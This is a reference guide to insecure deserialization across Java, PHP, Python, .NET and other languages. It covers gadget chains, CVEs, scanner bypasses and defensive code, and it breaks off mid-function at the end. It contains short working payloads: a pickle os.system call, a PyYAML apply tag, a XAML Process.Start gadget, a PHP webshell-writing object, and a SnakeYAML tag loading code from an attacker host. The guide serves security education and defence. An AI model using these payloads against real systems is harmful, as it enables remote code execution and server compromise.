Comprehensive Insecure Deserialization Guide

A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.

1. Fundamentals
2. Attack Surface & Entry Points
3. Java Deserialization
4. PHP Object Injection
5. Python Pickle & ML Pipelines
6. .NET Deserialization
7. Ruby Marshal & YAML
8. Node.js Deserialization
9. YAML & JSON Format Attacks
10. Gadget Chains Explained
11. Real-World CVEs & Exploitation Chains
12. Tools & Automation
13. Detection & Static Analysis
14. Prevention & Mitigation
15. Signature & Gadget Quick Reference

1. Fundamentals

Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.

Three broad impact classes:

Class	Description	Canonical Example
Remote Code Execution	Attacker reaches a native sink (`Runtime.exec`, `os.system`, `eval`, `system()`) through a gadget chain	Java CommonsCollections → `Runtime.exec`
Object Injection / Logic Abuse	Attacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLi	PHP `__destruct` → `file_put_contents` shell upload
Denial-of-Service	Recursive object graphs, billion-laughs, hash collision, resource exhaustion	SnakeYAML billion-laughs, Java `HashMap` hash DoS

Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.

The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.

Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.

2. Attack Surface & Entry Points

Where serialized blobs cross trust boundaries

Category	Examples
HTTP parameters	Base64-encoded `state`, `token`, `data`, `session`, `view`, `cache` params
Cookies	Session cookies, `remember_me`, flash messages, CSRF tokens encoding objects
Hidden form fields	ASP.NET `__VIEWSTATE`, Rails `_session_id`, JSF `javax.faces.ViewState`
Cache layers	Memcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions
Message queues	RabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services
RMI / RPC	Java RMI registry, JMX, JNDI, CORBA, DRb
File uploads	`.ser`, `.rdb`, `.pkl`, `.joblib`, `.pt`, `.phar` model/checkpoint files
WebSockets / IPC	Distributed serving frameworks passing pickle or Marshal over sockets
Email headers	`X-SerializedObject` style custom headers, WSDL SOAP bodies
Log ingestion	Log4j-style object injection, Graylog inputs, serialized stack traces
Database columns	Opaque `BLOB`/`bytea` fields holding serialized objects

Sink functions by language

Java:     ObjectInputStream.readObject(), XMLDecoder.readObject(),
          XStream.fromXML(), Yaml.load() (SnakeYAML),
          Jackson ObjectMapper with enableDefaultTyping(),
          Kryo.readObject(), Hessian, Castor, Burlap
PHP:      unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
          Laminas Zend_Serializer, Symfony Serializer XML
Python:   pickle.loads/load, cPickle, joblib.load, torch.load,
          numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
          shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET:     BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
          ObjectStateFormatter, NetDataContractSerializer,
          JavaScriptSerializer (with SimpleTypeResolver),
          Json.NET with TypeNameHandling != None, DataContractSerializer,
          XmlSerializer with arbitrary types
Ruby:     Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
          Oj.load (default mode), Rails cache store :marshal
Node.js:  node-serialize unserialize(), funcster, serialize-javascript
          (with IIFE), eval-based JSON revivers
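
The sink list above translates fairly directly into a first-pass source scan. The following is a minimal sketch, not a replacement for a real static analyzer: the regexes cover only a handful of the sinks listed, the suffix-to-pattern mapping is an assumption made for illustration, and `find_sinks_in_text` and `scan_tree` are hypothetical helper names.

```python
import re
from pathlib import Path

# Hypothetical starter patterns drawn from the sink list; extend per codebase.
SINKS_BY_SUFFIX = {
    ".java": [r"\breadObject\s*\(", r"\bfromXML\s*\(", r"\benableDefaultTyping\s*\("],
    ".php": [r"\bunserialize\s*\(", r"\byaml_parse\s*\("],
    ".py": [r"\bpickle\.loads?\s*\(", r"\bjoblib\.load\s*\(", r"\btorch\.load\s*\(",
            r"\byaml\.load\s*\(", r"\bjsonpickle\.decode\s*\("],
    ".cs": [r"\bBinaryFormatter\b", r"\bLosFormatter\b", r"\bTypeNameHandling\b"],
    ".rb": [r"\bMarshal\.load\b", r"\bYAML\.load\b"],
    ".js": [r"\bunserialize\s*\("],
}


def find_sinks_in_text(text, suffix):
    """Return (line_number, stripped_line) for each line that matches a sink pattern."""
    patterns = [re.compile(p) for p in SINKS_BY_SUFFIX.get(suffix, [])]
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if any(pat.search(line) for pat in patterns):
            hits.append((lineno, line.strip()))
    return hits


def scan_tree(root):
    """Yield (path, line_number, line) for every sink hit under a directory."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in SINKS_BY_SUFFIX:
            text = path.read_text(encoding="utf-8", errors="replace")
            for lineno, line in find_sinks_in_text(text, path.suffix):
                yield str(path), lineno, line
```

A hit only says that a sink exists; whether attacker-controlled bytes can reach it still has to be traced by hand.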

Content-type & magic byte fingerprints

Format	Signature	Notes
Java serialized	`AC ED 00 05` (`rO0` base64)	`ObjectOutputStream` header
PHP serialized	`O:<num>:"ClassName":<num>:{...}`	Also `a:`, `s:`, `i:` primitives
Python pickle	`80 04` / `80 05` (proto 4/5)	Starts with PROTO opcode
.NET BinaryFormatter	`00 01 00 00 00 FF FF FF FF`	`SerializationHeaderRecord`
Ruby Marshal	`04 08`	Major 4, minor 8
ASP.NET ViewState	`/wEP`, `/wEX` base64 prefix	Deserialized server-side
Phar	`<?php __HALT_COMPILER();` manifest	PHP-parsed metadata
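
The signatures in the table can be checked mechanically when triaging a parameter, cookie, or uploaded file. The sketch below is one possible shape for that check; the function names are hypothetical, and the two-byte magics (pickle, Marshal) are weak enough that a match should be read as "worth a closer look", not as proof.

```python
import base64
import binascii
import re

# (label, magic prefix) pairs taken from the fingerprint table.
RAW_SIGNATURES = [
    ("java-serialized", b"\xac\xed\x00\x05"),
    ("dotnet-binaryformatter", b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"),
    ("python-pickle", b"\x80\x04"),
    ("python-pickle", b"\x80\x05"),
    ("ruby-marshal", b"\x04\x08"),
]
# PHP objects (O:<len>:"Name") and arrays (a:<count>:{).
PHP_SERIALIZED = re.compile(rb'^(O:\d+:"|a:\d+:\{)')


def fingerprint_raw(blob):
    """Match raw bytes against the known magic prefixes."""
    for label, magic in RAW_SIGNATURES:
        if blob.startswith(magic):
            return label
    if PHP_SERIALIZED.match(blob):
        return "php-serialized"
    if b"__HALT_COMPILER();" in blob:   # PHAR stub marker, may follow other headers
        return "phar"
    return None


def fingerprint(value):
    """Try the raw bytes first, then retry after strict base64 decoding."""
    hit = fingerprint_raw(value)
    if hit:
        return hit
    if value.startswith((b"/wEP", b"/wEX")):
        return "aspnet-viewstate"
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return fingerprint_raw(decoded)
```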

3. Java Deserialization

The core primitive

Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.

ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject();   // attacker-controlled byte stream

The default readObject will happily deserialize any class on the classpath that implements Serializable. Unless a JEP 290 ObjectInputFilter has been configured, there is no type filter. The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.

Classic sink entry points

Sink	Library	Notes
`ObjectInputStream.readObject`	JDK core	Foundation of all classic Java deserialization bugs
`XMLDecoder.readObject`	`java.beans`	Pure XML RCE; constructor chains via `<object class=...>`
`XStream.fromXML`	XStream	Whitelist-by-default only since v1.4.18
`Yaml.load`	SnakeYAML (<2.0)	Instantiates arbitrary classes from `!!` tags
`ObjectMapper.readValue` + `enableDefaultTyping`	Jackson	Polymorphic deserialization via `@class` hints
`Kryo.readObject` / `readClassAndObject`	Kryo	Default config registers arbitrary classes
`HessianInput.readObject` / `Hessian2Input.readObject`	Hessian/Burlap	Used in older Spring Remoting, Caucho
`JNDI lookup`	JNDI/LDAP/RMI	Log4Shell’s cousin — remote class loading

Gadget chain anatomy (CommonsCollections1)

The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:

Entry gadget (readObject trigger). sun.reflect.annotation.AnnotationInvocationHandler has a readObject method that calls memberValues.entrySet(). If memberValues is a dynamic Proxy backed by another AnnotationInvocationHandler, entrySet() routes through InvocationHandler.invoke().
Bridge gadget (method dispatch). The inner AnnotationInvocationHandler.invoke() calls memberValues.get(name). When memberValues is a LazyMap, get() invokes the map’s factory.transform(key) for missing keys.
Transform chain (ChainedTransformer). A ChainedTransformer pipes the initial input through an array of Transformer instances, each feeding the next:
- ConstantTransformer(Runtime.class) — returns the Runtime class object
- InvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]}) — reflectively fetches the getRuntime method
- InvokerTransformer("invoke", ..., {null, new Object[0]}) — invokes it, returning a Runtime instance
- InvokerTransformer("exec", ..., execArgs) — finally calls Runtime.exec(cmd)

The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.
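
The mechanics are easier to see in a toy model. The sketch below re-creates the shape of the chain in Python, purely as an analogy: the class names mirror the commons-collections ones but this is not that library, `getattr` stands in for Java reflection, and the "sink" is a harmless string method instead of Runtime.exec.

```python
class ConstantTransformer:
    """Ignores its input and returns a fixed value."""
    def __init__(self, value):
        self.value = value

    def transform(self, _input):
        return self.value


class InvokerTransformer:
    """Calls a named method on its input (getattr stands in for reflection)."""
    def __init__(self, method_name, args=()):
        self.method_name = method_name
        self.args = args

    def transform(self, target):
        return getattr(target, self.method_name)(*self.args)


class ChainedTransformer:
    """Pipes a value through each transformer in order."""
    def __init__(self, transformers):
        self.transformers = transformers

    def transform(self, value):
        for transformer in self.transformers:
            value = transformer.transform(value)
        return value


class LazyMap(dict):
    """Fills in missing keys by calling factory.transform(key)."""
    def __init__(self, factory):
        super().__init__()
        self.factory = factory

    def __missing__(self, key):
        value = self.factory.transform(key)
        self[key] = value
        return value


# Harmless stand-in for the exec chain: only string methods are invoked.
chain = ChainedTransformer([
    ConstantTransformer("runtime"),
    InvokerTransformer("upper"),
    InvokerTransformer("replace", ("RUNTIME", "sink reached")),
])
lazy = LazyMap(chain)
result = lazy["any missing key"]   # an ordinary lookup drives the whole chain
```

None of the four classes is dangerous on its own. The danger comes from the data: which transformers are in the array, and which map a trusted caller ends up calling `get` on.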

Why patching individual gadgets fails

The AnnotationInvocationHandler entry was patched in JDK 8u72: readObject now copies the deserialized entries into a fresh LinkedHashMap instead of keeping the attacker-supplied memberValues map. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.

This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.

Well-known gadget chain families (ysoserial)

Chain	Trigger	Backend	Requires
`CommonsCollections1`	`AnnotationInvocationHandler.readObject`	LazyMap + ChainedTransformer	commons-collections 3.1, JDK ≤ 8u71
`CommonsCollections2`	`PriorityQueue.readObject` → `compare`	`TransformingComparator`	commons-collections4 4.0
`CommonsCollections5`	`BadAttributeValueExpException.readObject` → `toString`	LazyMap	commons-collections 3.1, any JDK
`CommonsCollections6`	`HashSet.readObject` → `hashCode`	LazyMap	commons-collections 3.1, any JDK
`CommonsBeanutils1`	`PriorityQueue` → `BeanComparator`	`PropertyUtils.getProperty` → reflection	commons-beanutils
`Groovy1`	`ConvertedClosure.invoke`	`MethodClosure("execute")`	Groovy ≤ 2.4.3
`Spring1`, `Spring2`	`ObjectFactory` proxy chains	JDK only + spring-core	Older Spring
`Hibernate1`, `Hibernate2`	`ComponentType.getPropertyValue`	JDK reflection	Hibernate
`JRMPClient` / `JRMPListener`	RMI remote class loading	Outbound JRMP callback	Network egress
`URLDNS`	`HashMap.readObject` → `URL.hashCode`	DNS lookup	Useful as blind probe (no RCE)
`ROME`, `Click1`, `Clojure`, `JBossInterceptors1`, `C3P0`, `MozillaRhino1`, `Myfaces1`, `Wicket1`	Various	Various	Application-specific

SnakeYAML (CVE-2022-1471)

Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.

Jackson polymorphic deserialization

Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() is set or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Blocklists (SubTypeValidator) are maintained by Jackson maintainers but have been bypassed repeatedly.

4. PHP Object Injection

The `unserialize()` primitive

PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:

Magic Method	When It Fires
`__wakeup()`	Immediately after unserialization
`__destruct()`	When the last reference to the object is released, or at script shutdown (end of request)
`__toString()`	When the object is cast to string (comparisons, echo, string concat)
`__call()`	When an undefined method is invoked
`__get()` / `__set()`	When undefined properties are accessed
`__invoke()`	When the object is called as a function
`__unserialize()` (PHP 7.4+)	Replaces `__wakeup` if defined

Serialized string format

O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}

O:12:"LoggingClass" — object of class LoggingClass (name length 12)
2:{...} — two properties
s:8:"filename" — string key of length 8
s:9:"shell.php" — string value of length 9
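
The length prefixes are byte counts, which is what makes hand-edited payloads fail when a value is changed without updating its prefix. As a minimal sketch of the encoding rules just described (public string properties only; `php_string` and `php_object` are hypothetical helper names, not part of any library), the example string can be rebuilt like this:

```python
def php_string(value):
    """Encode one string as s:<byte length>:"<value>";"""
    return 's:%d:"%s";' % (len(value.encode("utf-8")), value)


def php_object(class_name, props):
    """Encode an object whose properties are all public strings."""
    body = "".join(php_string(key) + php_string(val) for key, val in props.items())
    return 'O:%d:"%s":%d:{%s}' % (
        len(class_name.encode("utf-8")), class_name, len(props), body,
    )


example = php_object(
    "LoggingClass",
    {"filename": "shell.php", "content": "<?php evilCode(); ?>"},
)
```

Here `example` reproduces the serialized string shown above character for character.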

Property-Oriented Programming (POP) chains

Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.

Real POP chains are longer. Typical primitives:

A destructor that calls $this->obj->method() where $this->obj is another attacker-chosen class
A __toString that builds a SQL query or file path from properties
A __wakeup that calls eval, include, or file_put_contents on serialized properties
A __call that forwards to call_user_func_array($this->callback, $this->args)

PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.

Phar deserialization (pre-PHP 8)

A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:

Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
Trigger a file operation on phar://uploads/avatar.jpg/foo

…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.

Common PHP deserialization entry points

Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
WooCommerce and WordPress meta fields stored as serialized PHP
Yii restoreGET, CodeIgniter session library (with encryption disabled)
Symfony Cookie / State components in older versions
Legacy Zend Framework Zend_Serializer

5. Python Pickle & ML Pipelines

Pickle is a stack VM, not a data format

pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls them. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:

import os
import pickle

class P:
    def __reduce__(self):
        return (os.system, ("id",))   # recorded as "call os.system('id')"

payload = pickle.dumps(P())   # -> bytes that call os.system("id") on load

By default there is no blocklist and no sandbox. The only interception point is overriding Unpickler.find_class to allowlist globals, and the Python docs still say never to unpickle untrusted data. That warning sits in a box that approximately nobody reads, because the code that loads pickle files is written by ML engineers, not security engineers.
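
The one hook the standard library does offer is `Unpickler.find_class`, which is consulted whenever a pickle asks for a global. The sketch below follows the "restricting globals" pattern from the `pickle` documentation; the allowlist contents are an assumption chosen for illustration, and an allowlist this small only suits payloads made of plain containers and primitives.

```python
import builtins
import io
import pickle

# Assumed allowlist: a few harmless builtins. Everything else is refused.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream tries to import.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    """Like pickle.loads, but refuses any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

This narrows the attack surface but does not make pickle a safe format: anything added to the allowlist becomes a potential gadget, so a data-only format is still the better choice for untrusted input.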

The ML pipeline problem

Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:

Function	Actually Calls
`joblib.load(path)`	`pickle.load`
`torch.load(path)` (pre-2.6 default)	`pickle.load` over tensor data
`numpy.load(path, allow_pickle=True)`	`pickle.load`
`dill.load`	pickle with extra object support
`cloudpickle.load`	pickle with closure support
`HuggingFace transformers` older models	pickle under the hood
`ZeroMQ recv_pyobj()`	`pickle.loads` on wire bytes

A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.

CVE-2025-32444 (vLLM, CVSS 10.0)

vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”

LightLLM (CVE-2026-26220)

Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.

data = await websocket.receive_bytes()
obj = pickle.loads(data)   # untrusted WebSocket binary frame

There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.
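
For comparison, here is a sketch of what a data-only version of such a registration handler could look like. The field names and schema are hypothetical (the source only says the payload was strings, ints, and dicts), and the nonce check is written to fail closed so that an empty configured nonce rejects the request instead of skipping the check.

```python
import hmac
import json

# Hypothetical registration schema: field name -> required type.
ALLOWED_FIELDS = {"worker_id": str, "host": str, "port": int}


def check_nonce(expected, supplied):
    """Fail closed: an empty or unset expected nonce rejects every request."""
    if not expected:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def parse_registration(frame):
    """Parse a JSON frame and accept only the exact expected shape."""
    msg = json.loads(frame.decode("utf-8"))
    if not isinstance(msg, dict) or set(msg) != set(ALLOWED_FIELDS):
        raise ValueError("unexpected message shape")
    for field, expected_type in ALLOWED_FIELDS.items():
        value = msg[field]
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(value, bool) or not isinstance(value, expected_type):
            raise ValueError("bad type for %s" % field)
    return msg
```

Parsing JSON can at worst produce the wrong dict; it cannot call a function chosen by the sender.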

PickleScan is fundamentally fragile

Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:

ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
Non-standard file extensions — loader accepts it, scanner ignores it.
Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.

Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.
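
To make the scanner approach concrete, the sketch below lists the imports a pickle would perform by walking its opcodes with the standard `pickletools` module, then checks them against a blocklist. This is a simplified illustration, not picklescan's actual implementation: the blocklist is a tiny assumed sample, and the `STACK_GLOBAL` handling is a heuristic that a stream using memo lookups would already defeat, which is the fragility in miniature.

```python
import pickle
import pickletools

STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

# Assumed sample blocklist; real scanners carry much longer lists.
BLOCKLIST = {
    ("builtins", "eval"), ("builtins", "exec"),
    ("os", "system"), ("posix", "system"), ("nt", "system"),
}


def list_imports(data):
    """Return (module, name) pairs referenced by a pickle, without loading it."""
    imports, recent_strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Heuristic: assume the two most recent string pushes are the
            # module and attribute name. Memoized strings break this.
            imports.append((recent_strings[-2], recent_strings[-1]))
    return imports


def looks_dangerous(data):
    return any(pair in BLOCKLIST for pair in list_imports(data))


class _EvalOnLoad:
    def __reduce__(self):
        return (eval, ("1 + 1",))


demo_blob = pickle.dumps(_EvalOnLoad(), protocol=4)   # built here, never loaded
```

Any callable that is not on the blocklist passes this check, so the verdict is only as good as the list and the parser's agreement with the real loader.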

torch.load: incomplete migration

Before PyTorch 1.13, torch.load(path) unpickled the entire checkpoint with no restrictions. 1.13 added weights_only=True as an opt-in; 2.6 finally made it the default. But the installed base of unsafe patterns is enormous: old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.

Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.
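
"Integrity verification" in the rule above can be as simple as pinning a digest out-of-band and refusing to load anything that does not match. A minimal sketch using only the standard library follows; `verify_checkpoint` is a hypothetical helper, and where the pinned digest is stored (config, signed manifest, registry metadata) is left as an assumption.

```python
import hashlib
import hmac


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large checkpoints need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_checkpoint(path, expected_sha256):
    """Return path if the file matches the pinned digest, else raise."""
    actual = sha256_of(path)
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError("checkpoint digest mismatch for %s" % path)
    return path


# Usage, assuming a PyTorch version that supports weights_only (not imported here):
#   state = torch.load(verify_checkpoint("model.pt", PINNED_DIGEST), weights_only=True)
```

A matching digest proves the file is the one that was pinned, not that the pinned file was benign, so this complements `weights_only=True` and does not replace it.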

Supply-chain vector

Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:

Compromised account — push new weights, every downstream pull runs the payload
Typosquatting — bert-base-uncased vs bert_base_uncased
Malicious fine-tunes — functional model with payload in serialization wrapper
Tensor steganography — hiding callable references in weight perturbations small enough not to affect accuracy

PyYAML’s `yaml.load`

In PyYAML 5.1 through 5.4, yaml.load(data) without an explicit Loader emits a warning and falls back to FullLoader, which is meant to block arbitrary Python object construction; since 6.0 the Loader argument is mandatory. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:

!!python/object/apply:os.system ["id"]

Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.

6. .NET Deserialization

The dangerous formatters

.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:

Formatter	Status	Notes
`BinaryFormatter`	Insecure	Microsoft: “cannot be made secure”; obsoleted in .NET 5+
`SoapFormatter`	Insecure	Same type-loading model as BinaryFormatter
`NetDataContractSerializer`	Insecure	Preserves .NET types, loads arbitrary
`ObjectStateFormatter`	Insecure	ASP.NET ViewState backend
`LosFormatter`	Insecure	Legacy ASP.NET
`JavaScriptSerializer` with `SimpleTypeResolver`	Insecure	Allows `__type` hints
`Json.NET` with `TypeNameHandling != None`	Dangerous	`$type` property instantiates arbitrary classes
`XmlSerializer` with unrestricted types	Dangerous	Requires declared types at compile time; safer if constrained
`DataContractSerializer`	Safer	Known-types list enforced
`System.Text.Json`	Safe (default)	No polymorphic default

Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.

Sink patterns

// Classic vulnerable pattern: raw request bytes go straight into the formatter
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream);   // RCE

// Json.NET danger: a "$type" property in the JSON now selects the class
var settings = new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.All   // Objects, Arrays, and Auto are also risky
};
var fromJson = JsonConvert.DeserializeObject<object>(json, settings);

Known .NET RCE gadget families (ysoserial.net)

Gadget	Works Against	Notes
`TypeConfuseDelegate`	BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer	Sorts a list with a `MulticastDelegate` confused into calling `Process.Start`
`ActivitySurrogateSelector`	BinaryFormatter, SoapFormatter	Abuses surrogate selector to compile and run C# at deserialization time
`ActivitySurrogateSelectorFromFile`	Same	Variant that loads an assembly from disk
`WindowsIdentity`	BinaryFormatter, NetDataContractSerializer	Uses `WindowsIdentity` deserialization callback
`RolePrincipal`	Same	Security principal gadget
`DataSet`	BinaryFormatter, SoapFormatter, XmlSerializer with DataSet	`System.Data.DataSet` XML type confusion
`SessionSecurityToken`	Json.NET, NetDataContractSerializer	WIF token gadget
`ObjRef` (TransparentProxy)	Remoting	`.NET Remoting` cross-AppDomain trick
`TextFormattingRunProperties`	BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer, SoapFormatter	XAML-embedded `ObjectDataProvider` reach to `Process.Start`
`PSObject`	BinaryFormatter	PowerShell object gadget

XAML `ObjectDataProvider` — the universal .NET gadget

The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.

<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                    xmlns:s="clr-namespace:System;assembly=mscorlib"
                    xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd.exe</s:String>
      <s:String>/c calc</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>

ASP.NET ViewState

ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.

This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and the related “replay-style” attack, CVE-2021-27076. A custom webshell parses parameters from VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.

Defensive must-do: rotate ASP.NET machine keys after any suspected exposure; keep ViewState MAC validation enabled with a strong <machineKey> validation algorithm (for example HMACSHA256); do not disable ViewState MAC.
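
The reason the key matters so much is visible in a generic verify-before-deserialize scheme. The sketch below is not ASP.NET's actual ViewState wire format; it is a simplified model, with hypothetical `protect` and `unprotect` helpers, in which a state blob carries an HMAC-SHA256 tag that must validate before any parser sees the bytes.

```python
import base64
import hashlib
import hmac

MAC_LEN = hashlib.sha256().digest_size   # 32 bytes


def protect(state, key):
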